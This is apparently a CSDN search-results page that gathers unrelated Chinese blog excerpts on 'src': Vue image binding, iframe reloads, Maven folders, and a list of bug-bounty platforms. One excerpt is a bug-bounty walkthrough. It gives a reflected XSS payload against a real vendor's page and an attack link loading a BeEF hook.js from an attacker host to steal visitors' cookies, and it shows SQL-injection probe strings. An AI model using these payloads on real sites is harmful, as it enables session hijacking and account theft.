精华内容
下载资源
问答
  • 【Vue】vue中img的src属性绑定问题

    万次阅读 多人点赞 2018-07-31 19:52:55
    问题:img的src属性填写的图片地址,可以正常渲染,但是一旦利用绑定:src属性的时候,图片就加载失败了 需求:鼠标移入切换图片 上一位前端小哥哥,没做这个交互,我接手后加上去,很简答的交互,我替换图片的...

    问题:img的src属性填写的图片地址,可以正常渲染,但是一旦利用绑定:src属性的时候,图片就加载失败了
    需求:鼠标移入切换图片

    这里写图片描述
    上一位前端小哥哥,没做这个交互,我接手后加上去,很简答的交互,我替换图片的时候准备三元判断,src需要属性绑定,于是发现同样的地址,我放上去图片就是加载不出来,图片加载不出来,那肯定是地址问题了(插一句:上一位大佬文件结构可能不规范),一般都是static存放静态文件,但是他自己创建了一个stalic(哭笑.gif)

    上代码:

    <img src="../../../src/stalic/font/arrow0-0.png" alt="">  //上一位的
    
    <img :src="Bol == 1 ? imgUrl : imgUrl2" alt="">     //我的   data里面是:
    imgUrl: '../../../src/stalic/font/arrow0.png',
    imgUrl2: '../../../src/stalic/font/arrow0-0.png'
    

    但是浏览器并没有渲染出来我的图片,而他的图片可以正常渲染,同样的路径,为什么我的不显示? 而且浏览器还没有报错。

    原因:这里使用的是本地路径,想起来static静态文件夹,于是我将图片放入到static文件夹中
    这里写图片描述
    再次修改路径:

    imgUrl: ./static/arrow0.png,
    imgUrl2: ./static/arrow0-0.png
    

    或者,Common写法

    imgUrl: require('../../../src/static/font/arrow0.png'),
    imgUrl2: require('../../../src/static/font/arrow0-0.png')
    

    图片总算是出来了, 然后总结几个可以解决本地图片路径显示不出来的问题:

    1.把图片放在src同级的static文件夹下。
    2.把图片放在cdn上,把网络地址存在imgUrl里,然后直接<img :src="imgUrl">去展示。
    3.图片放在assets文件夹,然后在data里面require进图片

    data() {
    imgUrl:require('./assets/logo.png')
    }
    

    然后放入<img :src="imgUrl">展示即可。

    展开全文
  • 初识SRC漏洞平台提交漏洞

    万次阅读 多人点赞 2019-03-08 22:05:31
    1.1 漏洞平台 补天漏洞响应平台:https://butian.360.cn/ 漏洞银行:https://www.bugbank.cn/ ... i春秋SRC部落:https://www.ichunqiu.com/src 腾讯应急响应中心:https://security.tencent.com/index.php...

    //由于初学时使用工具较多,不建议对目标进行大批量扫描,手测为主,工具为辅,下文仅作示例,明白大体流程即可,实操为真。

    1.1 漏洞平台

    补天漏洞响应平台:https://www.butian.net/

    漏洞银行:https://www.bugbank.cn/

    阿里云漏洞响应平台:https://security.alibaba.com/

    i春秋SRC部落:https://www.ichunqiu.com/src

    腾讯应急响应中心:https://security.tencent.com/index.php

    网易、百度等等。

     

    1.2 网站情况

    常见漏洞类型:

    XSS、SQL注入、CSRF、权限绕过、文件上传、弱口令、代码执行等等。

     

    发现漏洞方法:

    1. 手工寻找(XSS,SQL注入,CSRF等等)。

    难度系数:⭐⭐⭐⭐  牛逼指数:⭐⭐⭐⭐⭐

    一般漏洞平台上除了刚出的服务厂商,其他大多数很明显的漏洞都被提交过了,手工找有些难度,有些网站在对非法字符的过滤也很到位,在url尝试是否存在sql注入,如 and 1=2 ,网站防护机制对用户一旦出现此类非法字符串,便对访问者ip进行连接重置,一段时间后才能访问。

     

    2. 工具扫描/辅助(AWVS、Nessus、sqlmap等等)

    难度系数:⭐⭐  牛逼指数:⭐⭐⭐

    在漏洞平台上的厂商,同样大部分明显直接的漏洞比较少,再加上有的有防火墙和web服务器配置,很多网站只要’察觉’到一个ip的非正常访问(比如扫描网站),就直接采用连接重置,或者无法访问,对扫描ip墙在外面。所以扫描工具的使用,也有一定条件。

     

    3. 手工寻找+工具扫描/辅助

    难度系数:⭐⭐⭐  牛逼指数:⭐⭐⭐⭐ 实用指数:⭐⭐⭐⭐⭐

    通过工具的辅助,找到漏洞点再结合自身知识利用漏洞,往往事半功倍,很有效果

     

    防护情况案例一:(可能会涉及到什么所以对厂商均打码)

    厂商:

     

    子网站教务系统,页面通过单独窗口实现信息显示,url无法测试。

     

    防护情况案例二:

    厂商

     

    找到asp脚本编写同时有id传参的页面

     

    尝试注入语句

    /video_list.aspx?s_classid=221 and 1=2

    回车

     

    防火墙拦截。

    防护情况案例三:

    厂商:大部分厂商

    即扫描工具扫描,服务器防御灵敏的直接墙掉ip,放宽点的当你扫描一定时候到达一定的时候,重置连接。

     

    1.3 发现/提交漏洞

    厂商

    网址:

     

    发现步骤

    1. 手工寻找

    网页的大部分新闻内容全为静态的内容,无下手之地。

     

    直到

     

    进入后是该网站的一个子网站,熟悉的php,寻找漏洞点

     

    注册:

     

    在手工找不到可能存在的漏洞点,尝试工具扫描

    //2021年注:由于19年刚接触使用工具较多,现阶段原则上是不允许批量漏扫工具对网站进行扫描,多以手工加漏洞验证为主。

    //以下示例仅熟悉流程即可,勿学博主用工具直接扫!!!!!!。勿学博主用工具直接扫!!!!!!

    //手工测试可对url进行burp的xss语句检测即可。

     

    使用工具(AWVS)进行站点扫描

    幸运的是,该站点对扫描没有进行设置防御,

    扫到该站点的目录

    其中Forbidden是权限不够无法访问,但是文件存在。

     

    接下来,很明显的看到了极有可能是后台admin目录

    不幸的是,能访问,文件也存在,无回显内容

     

    一片空白,继续换下一个思路

    查看是否存在漏洞。

    其中显目的第一个 Cross Site Scripting (XSS)

    寻找到这三个漏洞点

     

     

    进入直接弹出对话框

    接下来看是什么地方存在漏洞点:

     

    渗透测试XSS语句

    '%22()%26%25<acx><ScRiPt%20>prompt(931058)</ScRiPt>&system=ask&url=e

    经过简化

    %22 是url编码后的,原数据为 ” ,一个双引号,用于对html元素属性进行结束

     

    效果等同于:"><ScRiPt >alert(123)</ScRiPt>

     

    这里<acx><ScRiPt%20>prompt(931058)</ScRiPt> script采用了大小写重复,常用的绕过方法。其中prompt(931058) 是js中与用户交互的提示框,标题就为931058.

    其中prompt(931058)是工具的测试语句,换成熟悉的alert(‘XSS’) 便明显很多。

     

    这也能说明当右键编辑http请求的时候会弹出对话框。

     

    知道漏洞点漏洞原理后,找到漏洞点:

     

    /index.php/core/uploader-image_cut?module=item&system=ask&url=e

     

     

    其中/index.php/core为上文的注册页面,手工注册是打不开的,这也说明了工具利用的重要性。

    利用测试语句测试漏洞的存在

     

    漏洞是存在的,单单的弹窗无法提现出此漏洞的作用,

     

    接下来利用XSS漏洞

     

    利用工具:beef (kali下的xss平台)

     

    利用步骤:

     

    1. beef工具平台开启

     

     

    Kali ip:192.168.88.149

     

    2. 制造XSS利用链接:

    ’"()<acx><script src="http://192.168.88.149:3000/hook.js"> </script>

     

     

    3. 访问者访问

    Win10

    回车后,直观上网页无反应

     

    4. 查看beef平台

     

    可以看到ip,操作系统,系统软件的配置

    重要的在下面

     

    拿到访问者的访问cookie,可通过改包修改cookie登录访问者用户。

     

    到此结束,没有进一步的渗透(还不会高级的)。

     

    下面为漏洞提交的页面

     

     

     

    1.4 思路总结

    1. 学会工具和手工结合,会有意外收获。

    2. 常规注入点,漏洞点别放过。

    3. 发现漏洞,需测试漏洞的存在性(别破坏网站的完整)

    4. 漏洞利用,进一步提现漏洞的价值性,在提交的时候需要有漏洞利用过程截图等。

    5. 最后提出解决方案,完事。

    不做破坏!授权测试!

    展开全文
  • 问题描述html<iframe id="h5Content" src=""></iframe>js$("#h5Content").attr("src","${h5.url}");h5.url对应的是一个ueditor编辑好存到数据库的一个页面. 修改这个页面内容提交后,iframe 中呈现的页面并没有变化....

    问题描述

    html

    <iframe id="h5Content" src=""></iframe>
    

    js

    $("#h5Content").attr("src","${h5.url}");
    

    h5.url对应的是一个ueditor编辑好存到数据库的一个页面.
    修改这个页面内容提交后,iframe 中呈现的页面并没有变化.

    原因

    iframe的src的值发生改变,才会刷新iframe里面的内容.

    所以虽然我代码的url对应的页面有变化了,可是url一直不变,也就是iframe的src的值一直没变.所以不刷新内容;

    解决办法

    原因找到了,解决就非常容易了.想任何一种办法让iframe的src的值有变化就可以了.
    我当时的解决办法如下:

    $("#h5Content").attr("src","${h5.url}"+"?time="+new Date().getTime());
    

    给url后面通过问号传值,传一个当前时间,就解决了.这个值并没有其他用处,只是为了改变src的值.

    展开全文
  • 百度解决方法多次尝试以后发现我的jdk中没有src.zip文件,相反多出来一个javafx-src.zip,请问这两个是一个东西么? 如果是,那么ide不能看源码的问题该如何解答,如果不是,该去如何下载正确的src
  • src 与 ng-src 的区别

    千次阅读 2017-11-30 18:42:50
    1:如果url是常量 src与ng-src 均可 (src="vm.url" 或 ng-src="{{vm.url}}") 2:如果url是变量 选择ng-src (ng-src="{{vm.url}}") 原因:浏览器第一次加载模块时会请求 url 的地址,当ng编辑模板后,会把{{vm.url}}...
    1:如果url是常量   src与ng-src 均可  (src="vm.url"  或  ng-src="{{vm.url}}")

    2:如果url是变量  选择ng-src    (ng-src="{{vm.url}}")
    原因:浏览器第一次加载模块时会请求  url   的地址,当ng编辑模板后,会把{{vm.url}}替换成对应url后再请求真实的地址,ng-src很好的避免了第一次无效的请求.
    建议:在angular中 用ng-src=“{{vm.url}}”    在js中使用  src="vm.url"

    展开全文
  • 编译src.zip Java1.8 src.zip

    千次阅读 2017-11-16 00:20:51
    java 1.8 src.zip 编译 src.zip
  • img srcsrc-data

    千次阅读 2014-11-26 15:33:39
    data-src="${ctx}/themes/img/profiles/avatar_small.jpg"  data-src-retina="${ctx}/themes/img/profiles/avatar_small2x.jpg" width="35" height="35" /> src 直接获取路径 src-data js
  • img src写法

    千次阅读 2019-03-28 20:19:14
    <img src="/../../static/favicon.ico" class="blog-avatar-50" alt="czw"> 网上的教程是这样写的,src="../../static/favicon.ico",但是不行,所以在src前面加了/就行了。 ...
  • let src ="../../assets/imgs/ziyuan6.png"; require(src); require接收了一个变量,会报上面的警告,接收一个写死的字符串值时则没有警告! 下面三种写法没有报警告: require("../../assets/imgs/ziyuan6.png...
  • html中的src以及一些库的src文件夹

    千次阅读 2018-05-15 10:19:29
    &lt;img src="a.jpg"&gt;一些库文件夹下的src文件夹src是source(资源)的缩写
  • AngularJS 设置img (ng-srcsrc 区别)

    千次阅读 2019-03-17 11:32:36
    AngularJS 使用 ng-src 替换了src : &lt;img ng-src="{{imageUrl}}"&gt; 错误写法: &lt;img src="{{image_entity.url}}"/&gt; 正确写法 &lt;img ng-src="{{image_...
  • SRC漏洞挖掘总结

    千次阅读 2020-05-22 16:24:46
    博主从去年开始涉猎SRC挖洞,现在将分享一下我挖的漏洞以及漏洞思路,漏洞质量不是很高,高手请绕过。 一、 短信轰炸 目前大多数平台的短信验证码均做了频率限制、次数限制等,但是由于程序员在开发时候限制不严格...
  • jquery修改图片src

    万次阅读 2018-03-13 12:03:57
    jquery修改图片src,会重新请求此图片url,重新加载图片。方法如下:$("#img_pre").attr("src", src_value);
  • 引入src/main/resources目录下的资源文件 &lt;build&gt;  &lt;resources&gt;  &lt;resource&gt;  &lt;directory&gt;${project.basedir}/src/main/resources&lt;/directory&...
  • vue动态设置img的src路径

    万次阅读 2018-07-30 22:00:45
    相信开发的小伙伴已经遇到这个问题了,动态切换img标签的src时,写的路径就是不生效,原因是vue并没有把你的路径字符串当做路径来处理,而是直接当做字符串了,当然网上也有很多方法,这里使用的是最有效的方法。...
  • Augular中 src和ng-src的区别

    千次阅读 2017-10-16 21:23:38
    src 是 HTML的属性,{{}} 是 ng 的表达式, 表达式可用于很多地方,包含属性,所以直接 src="{{vm.url}}" 其实就是使用ng的表达式给属性赋值,这种做法的缺点是当第一次加载模板的时候浏览器会去请求 “{{vm.url}}” ...
  • 下面是一段测试代码: var img=document.getElementById("demo"); alert(img.src); alert(img.getAttribute("src"));...我们将文件保存在F盘下,然后运行,可以看到: ...img.getAttribute("src") 显
  • 在学习bootstrap时,书中的源码是用的data-src来定义图像位置,但是我在使用的时候无法显示图片;data-src可以在img标签中使用来显示图片吗?我使用src可以,而是用data-src不可以。书上的源码: class="thumbnail...
  • this.src=this.src"&gt;原先是这样的,可是点击没有反应解决方法 :&lt;img src="${ctxPath}/tool/imgCode" onclick="this.src=this.src+'?'"&gt;在后面拼接一个 '?'字符即可...
  • HTML img 中的 src 访问不到绝对路径下的图片怎么办?

    万次阅读 热门讨论 2020-10-10 10:49:33
    有时候我们使用 img 标签下的src属性访问图片的时候,会想把图片放到D盘或者E盘的某个路径。但是结果却是访问不到。一开F12调试却看到了绝对路径前面多了 file:///。就是下图这个样子。但是当我们用浏览器访问却可以...
  • 用eclipse创建项目后 在src文件夹下建包后 包却不在src文件夹下 问题描述:  用eclipse创建项目后 在src文件夹下建包后 包却不在src文件夹下呢?怎么包就跑下面了不在src下  图片如下:   解决方法:  项目右键...
  • 动态给src赋值

    千次阅读 2017-12-17 09:16:02
    function set_img_src() { $.each($('.info_content img'), function() { var src = $(this).attr('src'); src = 'http://' + src; var self = this; var dataurl = toBase64(src); $(this).attr('src',
  • 1.:src加载static可以,但是的加载的src就不行了src是可以加载src 下图片的
  • 一、说明本文会贴出如何使用Eclipse新建Maven项目并显示src/main/java、src/main/resources、src/test/java标准结构。二、实现(生成Maven项目)1、右键,New新建项目,选择Maven Project2、Filter输入web快速定位到...
  • 如果没有显示src/main/java和src/test/java文件夹:  方法一: 修改一些配置  1.eclipse-&gt;window-&gt;preferences-&gt;java-&gt;compiler-&gt;选择本地默认的jdk版本  2.eclipse-&...
  • maven项目没有src/main/java和src/test/java

    千次阅读 2017-08-10 16:59:11
    直接右键项目,build path>>configure build path 点击source 点击add folder ...直接在这个界面输入src/main/java ...src/main/java和src/main/resources对应的是target/classes src/test/
  • src/main/java:里面的java文件只能直接加载src/main/resources下的资源,不能直接加载src/test/resources下的资源; src/test/java: 里面的java文件既能加载src/test/resources下的资源,又能加载src/main/...
  • 各大src地址

    千次阅读 2018-09-21 15:22:39
    一、目录(以下排名不...2.联想安全应急响应中心(LSRC)-http://lsrc.lenovo.com/ 3.腾讯安全应急响应中心(TSRC)-https://security.tencent.com/ 4.京东安全应急响应中心(JSRC)-http://security.jd.com/ ...
  • 本文会贴出如何使用Eclipse新建Maven项目并显示src/main/java、src/main/resources、src/test/java标准结构。 二、新建项目 2.1Eclipse中,鼠标右键,New新建项目,选择Maven Project 2.2Filter输入web快速...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 1,150,163
精华内容 460,065
关键字:

src